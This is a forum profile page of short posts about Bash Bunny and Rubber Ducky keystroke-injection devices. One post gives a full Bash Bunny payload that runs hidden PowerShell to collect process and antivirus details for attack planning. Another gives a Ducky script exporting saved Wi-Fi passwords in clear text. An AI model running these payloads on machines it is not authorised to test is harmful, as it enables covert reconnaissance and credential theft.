Jump to content

Decoy

Active Members
 View Profile  See their activity

  • Posts

    248

  • Joined

  • Last visited

  • Days Won

    2

 Content Type 

Everything posted by Decoy

  1. Decoy

    Violation of CoC

    Decoy replied to illwill's topic in Payloads

    You are just cranking out payloads. I've tested this on a Windows 10 Machine and it works pretty well so far. Great payload, Sir.
  2. Decoy
    Indeed, share! I just picked up one of these bad boys too: https://hakshop.com/collections/wireless-gear/products/long-range-wifi-kit
  3. Decoy
    No worries. I wanted to make sure people could find it. That is an excellent payload.
  4. Decoy
    I forgot about that. I just installed all the tools and everything when I first got the BB and never gave it much thought after that.
  5. Decoy
    I'm pretty sure all of those keyboards are already available for the bash bunny, and I linked it as a reference only. So you can set to any of those languages as I've shown above, using the first 2 letters from each resource.
  6. Decoy
    Like the hardware or the software? If they are Android phones, you can most likely root the devices, and play with some custom roms.
  7. Decoy
    This is a link to the Rubber Ducky resources folder: https://github.com/hak5darren/USB-Rubber-Ducky/tree/master/Encoder/resources This will show you the available keyboard layouts.
  8. Decoy
    If you're in the HID attack mode, you can set your keyboard like so: Q SET_LANGUAGE DE Or US, and so on, and so forth.
  9. Decoy
    I think you might need to update the main GitHub link on your original post.
  10. Decoy
    Yeah, I really didn't start playing around with or learning PowerShell until I got my Rubber Ducky. Easy to learn, and extremely effective.
  11. Decoy
    This is just a quick and dirty payload to return all running processes under the current user. This will return the path/filename/version, and quite a bit of other info as well. This information can be useful for planning future attacks, such as taking advantage of buffer overflows, and other various vulnerabilities to gain a more permanent foothold into a target system. It can also be useful in identifying what AV is in use on a target system. An example of useful process info: Name : avpui Id : 724 PriorityClass : Normal FileVersion : 17.0.0.643 Path : C:\Program Files (x86)\Kaspersky Lab\Kaspersky Total Security 17.0.0\avpui.exe Company : AO Kaspersky Lab CPU : 85.875 ProductVersion : 17.0.0.643 Description : Kaspersky Anti-Virus Product : Kaspersky Anti-Virus https://github.com/DeeKoy/bashbunny-payloads/tree/master/payloads/library/ProcessInfo #!/bin/bash # # Title: Process Info # Author: Decoy # Version: 1.0 # Category: Recon # Target: Windows XP SP3+ (Powershell) # Attackmodes: HID, Storage # # # Amber Blink Fast.....Initialization # Amber................Begin # White Blinking... ...Moving loot to mass storage # Blue Blinking........Syncing File System # Green................Finished # Initialization LED R G 100 # Create loot directory mkdir -p /root/udisk/loot/ProcessInfo # Runs minimized powershell gathering process information for potential future attack vectors LED R G ATTACKMODE HID STORAGE QUACK DELAY 6000 QUACK GUI r QUACK STRING "powershell -NoP -NonI -W Hidden" QUACK ENTER QUCK DELAY 1000 QUACK STRING "\$Bunny = (gwmi win32_volume -f 'label=\"BashBunny\"' | Select-Object -ExpandProperty DriveLetter); Get-Process | Format-List -Property * | Out-File \$Bunny\\loot\\ProcessInfo\\ProcessInfo.txt; exit" QUACK ENTER LED R G B 100 sleep 1 # Sync File System LED B 100 sync; sleep 1; sync # Trap is clean LED G
  12. Decoy
    I'm pretty sure the payload already exists. Check this one out: Search the forums, you'll find a lot of payloads not officially published on the Wiki. Look at some examples, try playing with it. Good luck!
  13. Decoy

    Change background

    Decoy replied to korang's topic in Bash Bunny

    Doubtful. I don't think something like this can be done with network attack vectors. But someone can correct me if I'm wrong.
  14. Decoy
    Yes you can. You might be better off using PowerShell for it, but you'd just navigate to the ducky directory prior to running netsh.
  15. Decoy
    Awesome, it's definitely helpful. Thanks for creating this one for the Bunny!
  16. Decoy
    This actually wouldn't be a bad idea for the Ducky, LAN Turtle, and Pineapples as well.
  17. Decoy
    Check out this thread: https://forums.hak5.org/index.php?/topic/40581-bash-bunny-ducky-default-keyboard-language/
  18. Decoy
    In what context?
  19. Decoy
    Why not dump all the profiles? Try this instead: DELAY 1000 GUI DELAY 200 ENTER STRING cmd ENTER DELAY 600 STRING netsh wlan export profile key=clear ENTER This will dump all profiles and clear text wifi passwords into an xml file in whatever directory you're currently in.
  20. Decoy
    Is he really your Dad?
  21. Decoy
    Did this resolve your issue?
  22. Decoy
    Check out the recent Hashcat episode of Hak5, it just came out a few weeks ago. One of the Hashcat developers talked about which cards he prefers.
  23. Decoy
    That being said, I feel like using TABs and ARROWs can be hit or miss. It's too easy to have another process change focus, etc. I think the PowerShell line is the way to go. Another solution would be an ALT F4 combo. Good luck!
  24. Decoy
    I think all you should have to do is define the keyboard resource from the command line like this: java -jar duckencode.jar -i script.txt -o inject.bin -l resources/us.properties If that doesn't work, you can get the updated resources from GitHub. Let me know how it works out.
  25. Decoy
    Why did it get picked up by AV?
×
×
  • Create New...